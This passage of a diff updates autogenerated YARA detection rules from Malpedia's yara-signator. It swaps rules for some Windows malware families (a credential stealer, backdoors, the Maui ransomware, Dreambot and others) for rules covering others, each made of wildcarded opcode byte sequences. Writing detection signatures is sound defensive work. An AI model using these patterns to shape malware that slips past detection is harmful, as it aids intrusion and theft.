-		$sequence_8 = { 83c404 0fb6d0 83fa01 7531 8b45fc 83c001 8945fc }
-		$sequence_9 = { 51 8b5508 52 ff15???????? 83f8ff 7504 32c0 }
-		$sequence_10 = { 83c201 8955f4 ebaf 8b45f4 a3???????? 8b45f8 2b45f4 }
-		$sequence_11 = { 894d08 0fb6550c 83fa01 7509 8b4508 83c001 894508 }
-		$sequence_12 = { 6a00 ff15???????? 6880000000 ff15???????? }
-		$sequence_13 = { 0fbe02 8b4df8 0fbe11 3bc2 740b 8b45fc 83c001 }
-		$sequence_14 = { 8b55fc 0fbe02 85c0 750f 8b4d0c 894dfc 8b55f4 }
-		$sequence_15 = { 0f8440feffff 80fa05 7354 8b3b 0fb6f2 6a05 }
-		$sequence_16 = { f645fe20 740d 814a1804010000 8a03 884210 43 8ac3 }
-		$sequence_17 = { 32c0 c645ff00 895dec c645fb00 f3aa c645f810 }
-		$sequence_18 = { 807dfd05 eb12 807dfd04 c645fc03 0f879a000000 807dfd01 }
-		$sequence_19 = { 0f879a000000 807dfd01 0f8597000000 e9???????? 2d8c000000 747e 48 }
-		$sequence_20 = { 8b03 894210 83c304 eb13 f645fe20 740d 814a1804010000 }
-		$sequence_21 = { c3 8b4804 890e ff4808 897004 751e }
-		$sequence_22 = { 83c404 85c0 0f95c2 0fb6c2 }
-		$sequence_23 = { 55 8bec 81ecf80f0000 837d0800 }
-		$sequence_24 = { 8d85b8feffff 50 68???????? ff15???????? 8945fc }
-		$sequence_25 = { 83c40c 6804010000 8d85f8fdffff 50 }
-		$sequence_26 = { ff750c ff7508 ff15???????? 83f8ff 0f95c0 }
-		$sequence_27 = { 7522 be???????? ff15???????? 57 8906 ff15???????? 83c604 }
-		$sequence_28 = { 7507 68???????? eb05 68???????? 50 ff510c }
-		$sequence_29 = { 50 ff15???????? 837dfc00 0f95c0 c9 c3 }
-		$sequence_30 = { 7412 68???????? 50 ff15???????? f7d8 1bc0 40 }
-		$sequence_31 = { 50 ff15???????? 6a40 ff75f0 }
+		$sequence_0 = { 894c05d0 ba04000000 6bd200 8b45ec 894415b4 b904000000 c1e100 }
+		$sequence_1 = { 0fb6c8 85c9 0f84d4000000 8b550c 8955d8 8b4510 50 }
+		$sequence_2 = { 50 8b85e8fdffff 8b08 8b95e8fdffff 52 8b413c }
+		$sequence_3 = { 0fb6c8 85c9 753d 8d4dd8 e8???????? 50 }
+		$sequence_4 = { 83f832 0f8547170000 c745e400000000 8b4de4 894de8 8b55e8 8955e0 }
+		$sequence_5 = { 668b544144 668955fc 0fb745fc c1e004 8b4d08 8d940190c90000 b804000000 }
+		$sequence_6 = { e8???????? 83c404 89853cfeffff 8d4ddc 898d84feffff 8b9584feffff 899540fdffff }
+		$sequence_7 = { 8b4df0 668b544112 668955fc 0fb745fc c1e004 8b4d08 8d940190c90000 }
+		$sequence_8 = { 8d95f4fdffff 52 8d8d50fdffff e8???????? 8bc8 e8???????? 50 }
+		$sequence_9 = { 52 8b450c 50 8b8d0cffffff 51 e8???????? }
 
 	condition:
-		7 of them and filesize < 507904
+		7 of them and filesize < 466944
 }
-rule MALPEDIA_Win_Sysraw_Stealer_Auto : FILE
+rule MALPEDIA_Win_Rofin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c0b55ef6-5e72-5427-8051-b4c3cd8766ea"
+		id = "c9b1467e-a51a-5bb8-8a94-4fccc519267e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sysraw_stealer_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rofin_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "c61c4a8b05627678a7ba0afb4e01a7aec8181a910b716ed57582ec5bcddd612c"
+		logic_hash = "d75f02a0b301194d004b242ba71e57b27fdd5fa1479d807d198f353683f5f00e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90461,32 +90451,32 @@ rule MALPEDIA_Win_Sysraw_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd3 8bd0 8d8decfeffff ffd6 8b4d90 8d9580feffff 83c114 }
-		$sequence_1 = { 56 ff512c 8b55bc 8b06 8d8d54feffff }
-		$sequence_2 = { 33c9 8955bc 894de4 ba3f000000 }
-		$sequence_3 = { 6a0d 57 56 ff5238 }
-		$sequence_4 = { 8bf8 ffd6 3bfb 7472 }
-		$sequence_5 = { 8b8df8feffff 8b85f4feffff 898d24feffff 8b8df0feffff 898d1cfeffff }
-		$sequence_6 = { 8b550c 8b06 51 52 56 }
-		$sequence_7 = { 2bd7 6a00 42 83ec08 895590 db4590 }
-		$sequence_8 = { 8bd0 8b45d4 51 f7da }
-		$sequence_9 = { 50 ffd3 8bd0 8d8d24ffffff ffd6 }
+		$sequence_0 = { 83f804 753f 8b11 8a02 3c30 7507 8b5108 }
+		$sequence_1 = { 837c241801 7407 33db e9???????? 6a00 6a00 56 }
+		$sequence_2 = { 56 57 8b7c2414 33c0 33f6 85ff }
+		$sequence_3 = { e8???????? 8bf0 83c404 803e00 7453 6a0a }
+		$sequence_4 = { 8a4802 84c9 743f 8a4801 84c9 750e 8a4802 }
+		$sequence_5 = { 56 3b0d???????? 57 7358 8bc1 c1f805 8d3c85209e4200 }
+		$sequence_6 = { 45 f2ae 8b442410 f7d1 2bf9 83c00d 8bd1 }
+		$sequence_7 = { 89b42434010000 c744242800000000 ff15???????? 8d4c2418 51 56 e8???????? }
+		$sequence_8 = { 59 c3 8b8d90fcffff e9???????? 8b8d90fcffff 81c168030000 e9???????? }
+		$sequence_9 = { 8b442424 6a40 68???????? 50 e8???????? 83c41c 5f }
 
 	condition:
-		7 of them and filesize < 1540096
+		7 of them and filesize < 409600
 }
-rule MALPEDIA_Win_Portstarter_Auto : FILE
+rule MALPEDIA_Win_Maui_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e44ac3aa-4f26-585d-bdee-c9904fdae8c9"
+		id = "c8e2f403-ec0e-5c62-bc65-b773780a2de5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.portstarter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.portstarter_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maui"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.maui_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "73b0c7ed74c72cbbc30b57a6a611882f5357bf630e7fd50ae5a5939e6bfc7459"
+		logic_hash = "7f30138f7904f9e137800e0205092628d325a3b69e4098e86eb63774c736d746"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90500,34 +90490,32 @@ rule MALPEDIA_Win_Portstarter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8b9c24a8010000 4c89442448 7507 4d8b4c2408 }
-		$sequence_1 = { 4c8b8c24d8000000 4d8b5918 4d8b6318 4d8b6b08 4d8b1b 4d39e5 0f8645050000 }
-		$sequence_2 = { 4c8b9c24b8000000 498d3c03 488b842410010000 4c89d1 4c89c6 90 }
-		$sequence_3 = { 4c8b942468010000 4d21fa 4d09d5 49c1ed3f 4f8d1404 4d01ea }
-		$sequence_4 = { 4c8d6424f0 4d3b6610 0f8660030000 4881ec90000000 4889ac2488000000 488dac2488000000 }
-		$sequence_5 = { 4c8b9424d8000000 4c8ba42400010000 4c896310 4c895318 }
-		$sequence_6 = { 4c8b9424d8000000 4d39e2 0f8745010000 0f8734010000 }
-		$sequence_7 = { 4c8d6424d0 4d3b6610 0f8610020000 4881ecb0000000 }
-		$sequence_8 = { 41b800de1b00 488d15d02f0000 488d4c2420 e8???????? }
-		$sequence_9 = { 4863442430 486bc010 488d0de3061c00 4803c8 }
-		$sequence_10 = { 4883ec48 8b442458 89442424 48c744242800000000 41b800de1b00 }
-		$sequence_11 = { 488d0de3061c00 4803c8 488bc1 48634c2434 }
+		$sequence_0 = { 85ff 7505 49 85c9 7ff2 894e04 5f }
+		$sequence_1 = { 85f6 7479 6a00 e8???????? 8d4c240c 51 89442410 }
+		$sequence_2 = { 241c 51 57 e8???????? 83c418 85c0 }
+		$sequence_3 = { 50 53 e8???????? 83c408 85c0 0f84a2000000 83c602 }
+		$sequence_4 = { 68d7020000 68???????? 6886000000 68a3000000 6a06 c7450000000000 e8???????? }
+		$sequence_5 = { 894c2420 0fb60f bd07010000 897c241c 66852c48 7431 0fb64f01 }
+		$sequence_6 = { 41 57 51 e8???????? 83c40c 85c0 0f84d9000000 }
+		$sequence_7 = { e8???????? a3???????? e8???????? 85c0 7d09 e8???????? 85c0 }
+		$sequence_8 = { 8b5c2410 55 8b6c241c 57 8b7c241c 81fd00000040 724e }
+		$sequence_9 = { 3bca 741f 8b4624 3bc2 7418 894c2418 895620 }
 
 	condition:
-		7 of them and filesize < 14216192
+		7 of them and filesize < 1616896
 }
-rule MALPEDIA_Win_Doorme_Auto : FILE
+rule MALPEDIA_Win_Makadocs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a443311b-0d69-50e1-b7af-6bea174db5b1"
+		id = "3783cfc0-154b-51b0-b2f8-112def4fc579"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doorme_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.makadocs_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "9459417024dba9c22cb08f7485ab12bc8f994d94a97e4b89e9d80101a9a838df"
+		logic_hash = "bc62432004ad887b8979c87f3801ee7c6c80fe20ba6026d285a25c1d6c33524c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90541,32 +90529,32 @@ rule MALPEDIA_Win_Doorme_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 817d0063736de0 7528 48833d????????00 741e 488d0d70e50100 e8???????? 85c0 }
-		$sequence_1 = { 488bd8 488d9530010000 4883bd4801000010 480f439530010000 498b07 4c8d85e8000000 }
-		$sequence_2 = { 483bf8 7730 488d041f 48894548 488d4538 4983fe10 480f434538 }
-		$sequence_3 = { e8???????? 49897f10 49c747180f000000 41c60700 498b5618 4883fa10 0f82adfeffff }
-		$sequence_4 = { 4532d1 44881408 418d4001 440fb60c08 8d4705 4432cd }
-		$sequence_5 = { 488bd8 4885db 488d0571b80100 488d4f58 480f44d8 488bd3 488b5c2430 }
-		$sequence_6 = { 48c7c03f000000 23c1 488d0d4abb0100 f20f5904c1 f20f5804c1 660f72e406 660f73f434 }
-		$sequence_7 = { e8???????? 488b5c2430 4883c420 5f c3 4883ec28 4c8d0d0d660100 }
-		$sequence_8 = { 488d0538030300 49894408f0 488b07 4c634004 }
-		$sequence_9 = { 48894308 48895e40 48897e48 48896e50 488bce e8???????? 884658 }
+		$sequence_0 = { 50 e8???????? 83c414 8d5c2414 c644243008 e8???????? c644243003 }
+		$sequence_1 = { 750d 8d460c 55 e8???????? 84c0 7436 8b4c242c }
+		$sequence_2 = { c644242c07 8b442434 51 83c0f0 89642420 8bf4 e8???????? }
+		$sequence_3 = { eb12 8b442420 8b4804 51 ff15???????? }
+		$sequence_4 = { 8b00 83c404 50 e8???????? 8b9548ffffff 894250 8b8554ffffff }
+		$sequence_5 = { 85f6 0f8c09020000 3bf1 0f8f01020000 03c6 }
+		$sequence_6 = { 8d5c2410 c64424300c e8???????? b303 885c2430 8b44241c }
+		$sequence_7 = { 50 b9???????? e8???????? 8d4c2420 51 8d4c2450 c68424a80000002d }
+		$sequence_8 = { 8d4c2440 e8???????? 8d542444 68???????? b314 }
+		$sequence_9 = { 83c404 56 8944241c ff15???????? }
 
 	condition:
-		7 of them and filesize < 580608
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Mole_Auto : FILE
+rule MALPEDIA_Win_Rerdom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "95af4ae3-464a-5d8e-afd4-0a11f6d0106b"
+		id = "241210bd-111a-5707-8897-9f53944f382f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mole_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rerdom_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "8a4687261d47d17fe0f3216955f42cc9f1da6596391fc3e1935f901a9405d6fa"
+		logic_hash = "e2884a0afa7a1b2f6c9a54d86366aeef6787f3f56ae7efd9ba84c1b1c522c12e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90580,34 +90568,34 @@ rule MALPEDIA_Win_Mole_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 81bdf0fdffffc7a4d005 0f846a6a0000 81bdf0fdffffcba4d005 0f8478790000 e9???????? 81bdf0fdffffd0a6d005 }
-		$sequence_1 = { 8d85f0ebffff 03c1 8b8d14e5ffff 50 8b8530e5ffff 8b048578f64100 }
-		$sequence_2 = { ff15???????? c745f800000000 c745fc00000000 6a00 6a18 68???????? }
-		$sequence_3 = { 52 ff15???????? 83c41c 6a01 8d85ecf0ffff 50 }
-		$sequence_4 = { 0f873b5a0000 8b8df0fdffff 0fb69130cd4000 ff249518cd4000 8b85f0fdffff }
-		$sequence_5 = { 898570faffff 83bd70faffffff 7431 6a00 8d8d44faffff 51 8b955cfaffff }
-		$sequence_6 = { 83bde8feffff02 750c c785dcfeffff07000000 eb46 83bde4feffff06 7515 83bde8feffff03 }
-		$sequence_7 = { 0fb6822cb64000 ff24850cb64000 81bdf0fdffff596ad005 7746 81bdf0fdffff596ad005 0f848d5a0000 }
-		$sequence_8 = { 7d0d 8a441918 888168c44100 41 ebe8 }
-		$sequence_9 = { 0f8473590000 e9???????? 81bdf0fdffffc360d305 7725 81bdf0fdffffc360d305 }
+		$sequence_0 = { 72f0 8bc3 e8???????? 8d45e4 50 ff15???????? 8b4510 }
+		$sequence_1 = { 7406 c70003010000 85db 740f 53 ff742408 e8???????? }
+		$sequence_2 = { 754d 8b4604 3bc3 7346 3b4608 7341 }
+		$sequence_3 = { 743d 83fb09 7338 8d4704 56 50 8945fc }
+		$sequence_4 = { 894618 85c0 0f84c8000000 a1???????? 85c0 7522 68???????? }
+		$sequence_5 = { 750a 8d75ec e8???????? ebb8 b001 5e }
+		$sequence_6 = { b8???????? 8bcb e8???????? 3bc6 0f8419ffffff 57 b8???????? }
+		$sequence_7 = { 05???????? 50 8d44247c 50 e8???????? 8b442420 2b442424 }
+		$sequence_8 = { 8b45fc c9 c20c00 55 8bec 56 8d4508 }
+		$sequence_9 = { 0f849c000000 e8???????? 8bf8 85ff 0f8489000000 8b44240c 8b88f0000000 }
 
 	condition:
-		7 of them and filesize < 297984
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Hawking_Auto : FILE
+rule MALPEDIA_Win_Dreambot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ec9f39f6-86ba-5455-97b7-92972ad75506"
+		id = "53f43e42-1768-565e-8f9c-297b1c07d8f4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawking"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hawking_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dreambot_auto.yar#L1-L872"
 		license_url = "N/A"
-		logic_hash = "38946ce524bb812dc9a51e3c54c74cdb8d87a613cbaf2402323bc2266d8ec447"
+		logic_hash = "cddaa00c4f6e4bc7a58bc64756492fafadc3729bcd6bcbd8f6bc9664c264e892"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -90619,34 +90607,122 @@ rule MALPEDIA_Win_Hawking_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2c02 16 2a 06 }
-		$sequence_1 = { 06 6f2c00000a 26 06 6f2d00000a 6f2e00000a 750d000001 }
-		$sequence_2 = { 08 16 08 8e 69 6f2100000a }
-		$sequence_3 = { 2d04 26 14 2b05 }
-		$sequence_4 = { 281c00000a 02 07 6f1900000a 72ba010070 6f1a00000a 2807000006 }
-		$sequence_5 = { 0b 14 0c 732f00000a 0d 16 }
-		$sequence_6 = { 6f0e00000a 1200 280f00000a 2dde de0e 1200 fe160200001b }
-		$sequence_7 = { 2df6 06 6f06000006 de0c 6f3400000a 2801000006 }
-		$sequence_8 = { 0c 07 6f1900000a 72ba010070 }
-		$sequence_9 = { 03 282400000a 2801000006 732500000a 0a 06 }
+		$sequence_0 = { 8b4f30 83e140 0b4b18 83671800 }
+		$sequence_1 = { 85c0 751f ff15???????? 8bf8 81ffe5030000 751a }
+		$sequence_2 = { ff7320 ff15???????? 50 ff7320 56 ff5710 }
+		$sequence_3 = { ff15???????? 85c0 7410 ff742410 33ff e8???????? 8b7d0c }
+		$sequence_4 = { ffd6 8b44240c 894320 68???????? ff7320 ff15???????? }
+		$sequence_5 = { 751a 395d10 7413 8b4618 e8???????? eb09 }
+		$sequence_6 = { 68???????? 68???????? ff7320 e8???????? 8bf8 }
+		$sequence_7 = { 0f84cd000000 8d442410 50 8d442410 }
+		$sequence_8 = { 3bf3 0f8481000000 395d0c 747c 6a03 ebcc 3bf3 }
+		$sequence_9 = { 3bc2 480f45ca 488bc1 4883c438 c3 488bc4 }
+		$sequence_10 = { 395d0c 0f848d000000 6a07 ebdd 3bf3 0f8481000000 }
+		$sequence_11 = { a1???????? 85c0 7520 3bf3 741c 837d0c04 }
+		$sequence_12 = { 837d0c04 7516 ff7510 ff36 68???????? e8???????? 8bf8 }
+		$sequence_13 = { ebcc 3bf3 7474 395d0c 746f 6a0d ebbf }
+		$sequence_14 = { 746f 6a0d ebbf ff7510 53 68???????? eb54 }
+		$sequence_15 = { 8b7d08 eb24 a1???????? 85c0 }
+		$sequence_16 = { 56 68???????? e8???????? 894508 8b7d08 eb24 }
+		$sequence_17 = { 413bc5 7528 493bfd 7423 41b904000000 }
+		$sequence_18 = { c3 4053 4883ec20 4c8b4108 488bd9 }
+		$sequence_19 = { e8???????? e9???????? 493bfd 0f84b5000000 413bf5 0f84ac000000 }
+		$sequence_20 = { 4c8bc5 e8???????? 8bd8 83fbff 7508 }
+		$sequence_21 = { bb57000000 e8???????? 413bc5 7446 }
+		$sequence_22 = { 7464 413bf5 745f 8bd6 488bcf bb57000000 }
+		$sequence_23 = { 33d2 ff15???????? 4c8d5c2470 8bc7 }
+		$sequence_24 = { 747c 41b80d000000 eba7 33d2 }
+		$sequence_25 = { e8???????? eb2c 8b05???????? 413bc5 }
+		$sequence_26 = { e9???????? 8bd6 488bcf e8???????? e9???????? 4c392d???????? 740c }
+		$sequence_27 = { 46 8945f8 85c0 7551 }
+		$sequence_28 = { 8b450c 33db 895dfc e8???????? 8945f8 33ff }
+		$sequence_29 = { 817424105085b8ed 33ff 47 57 be???????? 56 8d542418 }
+		$sequence_30 = { e8???????? 4885db 7417 488b0d???????? 4c8bc3 33d2 }
+		$sequence_31 = { ff7310 ff15???????? 33d2 89b7184a0000 }
+		$sequence_32 = { 488bcb e8???????? f7d0 eb07 8b8424c8000000 3dcad2b74e }
+		$sequence_33 = { 8db4083089b9ed 57 8d45f4 50 8b450c 33db 895dfc }
+		$sequence_34 = { 8945f8 33ff eb03 8b750c ff75f8 69f60d661900 }
+		$sequence_35 = { 85c0 7551 ff33 50 }
+		$sequence_36 = { 7427 488b5308 488bc8 ff15???????? 4c8b472c 488b0d???????? }
+		$sequence_37 = { 8b463c 488b1e 2b471c 4489742478 448974247c 488b542478 }
+		$sequence_38 = { 8b87184a0000 56 33f6 46 8945f8 }
+		$sequence_39 = { 8b424c a801 0f840f010000 8b424c a806 740e e8???????? }
+		$sequence_40 = { 8a07 2c41 3c05 8a07 7704 2c37 eb0a }
+		$sequence_41 = { 89442440 488bf9 e8???????? 488d542438 33c9 ff15???????? 448b5c2438 }
+		$sequence_42 = { 488bf0 0f84a3000000 8b942490000000 4c8b442440 }
+		$sequence_43 = { 33d2 ff15???????? 8bc6 488b9c24c0000000 }
+		$sequence_44 = { ff15???????? 8945fc 85c0 741a 6804010000 8d4f10 51 }
+		$sequence_45 = { 89750c 8d750c e8???????? 8bf0 }
+		$sequence_46 = { ff15???????? 4883f8ff 488bf8 7445 488d842488000000 }
+		$sequence_47 = { 69f60d661900 ff75f4 81c65ff36e3c 89750c 8d750c }
+		$sequence_48 = { c3 6a00 6800004000 6a00 ff15???????? a3???????? }
+		$sequence_49 = { 3decc7eea6 0f84e8000000 3d0470a8c4 0f8486000000 }
+		$sequence_50 = { 7551 ff33 50 6810040000 ff15???????? 8945fc 85c0 }
+		$sequence_51 = { 48895f2c 8b464c a802 7410 8b464c }
+		$sequence_52 = { 488d4c2440 ff15???????? 0fb74c2442 b856555555 }
+		$sequence_53 = { 4c8bc3 33d2 ff15???????? 4c8b442478 488b0d???????? 33d2 }
+		$sequence_54 = { ff75fc e8???????? 8b45f0 40 c745e801000000 }
+		$sequence_55 = { ff742404 a3???????? e8???????? 85c0 7551 ff742404 e8???????? }
+		$sequence_56 = { ff35???????? ff15???????? eb22 ff7518 }
+		$sequence_57 = { e8???????? 85c0 0f849b000000 8d45f4 50 }
+		$sequence_58 = { 3bc6 7551 a1???????? 8b4014 85c0 }
+		$sequence_59 = { 493bce 753a 8b05???????? 488b0d???????? }
+		$sequence_60 = { e8???????? e9???????? 3bf3 0f8435010000 395d10 0f842c010000 }
+		$sequence_61 = { 8be5 5d c20400 8325????????00 6a00 68???????? 6a01 }
+		$sequence_62 = { e8???????? 8bf8 3bfb 0f857c040000 }
+		$sequence_63 = { 83ffff 0f843b010000 81ff02010000 0f8499000000 }
+		$sequence_64 = { 4183c501 443b2e 730a eba9 4533f6 eb08 }
+		$sequence_65 = { ff15???????? 85c0 7412 4881c720010000 4183c501 443b2e 730a }
+		$sequence_66 = { 81ff02010000 0f8499000000 f605????????08 6aff 68806967ff 56 7408 }
+		$sequence_67 = { 5b c9 c20800 55 8bec 81ec1c010000 8d4807 }
+		$sequence_68 = { 83cfff 443bd3 7349 448bdf 452bda }
+		$sequence_69 = { 498d5c2478 e8???????? 4e8b4cb61e 4e8b44b616 33c9 }
+		$sequence_70 = { 81ff02010000 0f8495000000 8b3d???????? 6aff 68806967ff }
+		$sequence_71 = { ffb72c080000 e8???????? 5e 5d 5b c3 eb10 }
+		$sequence_72 = { 493bed 75a1 488bb42480000000 4c8b742470 }
+		$sequence_73 = { 83c40c 83c01e 50 ffd7 ff35???????? }
+		$sequence_74 = { 41 f00fc108 a1???????? 83c01e 50 ff15???????? }
+		$sequence_75 = { 5b 8be5 5d c3 0fb708 6683f902 }
+		$sequence_76 = { 85c0 0f85b7000000 56 ff742428 ffd7 8bf8 }
+		$sequence_77 = { ff15???????? 8bc3 e9???????? 48895c2408 4889742410 57 }
+		$sequence_78 = { 488b15???????? 4c8d442468 48c7c101000080 ff15???????? }
+		$sequence_79 = { 83a78c00000000 33c0 c3 51 e8???????? 0558020000 }
+		$sequence_80 = { 50 ff742428 89542464 ffd3 56 57 }
+		$sequence_81 = { 56 ff742468 ffd7 85c0 0f85b7000000 }
+		$sequence_82 = { 56 0f84e9000000 ff74241c ffd7 }
+		$sequence_83 = { ff15???????? 85c0 743f 66ba2e00 498bcf ff15???????? 4885c0 }
+		$sequence_84 = { 5b c20800 51 53 57 }
+		$sequence_85 = { ff742414 e8???????? 813d????????58876837 7525 6a01 e8???????? 6a01 }
+		$sequence_86 = { 8bfb 8898d8fdffff e8???????? 448bac2400030000 440fb7db 4183fd25 }
+		$sequence_87 = { a3???????? bf???????? 33f6 8b8618c60310 e8???????? 8947fc }
+		$sequence_88 = { 8b483c 66f74401160020 7408 c744244c8e85be03 e8???????? }
+		$sequence_89 = { 89b31c70be03 740a 83c304 83fb14 72c9 eb12 }
+		$sequence_90 = { 85c0 0f849d010000 395c244c 7407 68???????? }
+		$sequence_91 = { 894df8 894dec c745e0e724be03 8945d8 751b f605????????01 7412 }
+		$sequence_92 = { e42c d08b19ec3bc2 14e1 32ec }
+		$sequence_93 = { f3ab e8???????? 8bf0 3bf3 0f85d4020000 }
+		$sequence_94 = { 8bd8 83fbff 0f843d010000 81fb02010000 0f8496000000 }
+		$sequence_95 = { 46 33048d1062be03 85ff 75cf f7d0 eb02 33c0 }
+		$sequence_96 = { 0fb6b120d00310 0fb6b9a0d00310 0fb68c0632900000 0fb7b470928a0000 894df4 8b4844 d3e6 }
+		$sequence_97 = { ffd6 ff742414 ff742414 57 e8???????? }
 
 	condition:
-		7 of them and filesize < 50176
+		7 of them and filesize < 778240
 }
-rule MALPEDIA_Win_Fuwuqidrama_Auto : FILE
+rule MALPEDIA_Win_Korlia_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fa930744-5999-561a-b1cf-4c1122391afe"
+		id = "506d7e40-9719-5cd2-8082-4c83f4ea46d2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuwuqidrama"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fuwuqidrama_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.korlia_auto.yar#L1-L483"
 		license_url = "N/A"
-		logic_hash = "76d62a17f159b8ceb3cf4ce032c2e526c9b8417f56a11565dc77a48334fec771"
+		logic_hash = "35dbce2c60635b96058b21e359bfd25de3754320395854f3bf9872914070ac08"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -90658,34 +90734,77 @@ rule MALPEDIA_Win_Fuwuqidrama_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 8bcf e8???????? 8d9424d4020000 6a04 52 8bcf }
-		$sequence_1 = { 83c10c 48 894c2434 89442418 75bd 8b742444 8b06 }
-		$sequence_2 = { c1fa05 8bc2 c1e81f 03d0 895508 8d4d08 6a04 }
-		$sequence_3 = { 33d2 eb16 8b4e08 2bc8 b815024d21 f7e9 c1fa06 }
-		$sequence_4 = { fec8 5f 8841ff 8bc5 5e 5d 5b }
-		$sequence_5 = { b90b000000 8bf0 8bfa 83c02c f3a5 8b4c2420 83c22c }
-		$sequence_6 = { 23ee 8b742428 23f7 8bd9 0bee 8b74241c c1c305 }
-		$sequence_7 = { 8db5f4000000 8d9d14010000 c744241800000000 e8???????? 8b442410 85c0 0f8c08010000 }
-		$sequence_8 = { 83c410 48 894720 53 ff15???????? 5f 5e }
-		$sequence_9 = { 03ee 8b742410 c1c71e 8db42ea1ebd96e 8b6930 33691c 33df }
+		$sequence_0 = { 6a28 68???????? 6aff 53 }
+		$sequence_1 = { 8bfa f7ef c1fa14 8bc2 c1e81f }
+		$sequence_2 = { 0f9445e4 5b 59 5a c745fcffffffff }
+		$sequence_3 = { c3 85db 7410 6a28 }
+		$sequence_4 = { 53 6a00 6a00 ffd6 ff15???????? 8bf8 b83bd4b531 }
+		$sequence_5 = { 51 68???????? 68???????? ffd6 b905000000 }
+		$sequence_6 = { 85c0 7507 53 ff15???????? 55 }
+		$sequence_7 = { ffd6 8bc7 b980ee3600 99 f7f9 b873b2e745 }
+		$sequence_8 = { 53 6a01 53 53 53 51 ff15???????? }
+		$sequence_9 = { 8b442404 56 6a00 6a00 6a01 }
+		$sequence_10 = { 6a01 6a00 6a00 6800000040 50 ff15???????? 8bf0 }
+		$sequence_11 = { e8???????? 8a4c2404 6a01 884814 8b4c240c }
+		$sequence_12 = { 7423 8b542410 8b44240c 8d4c2408 6a00 51 }
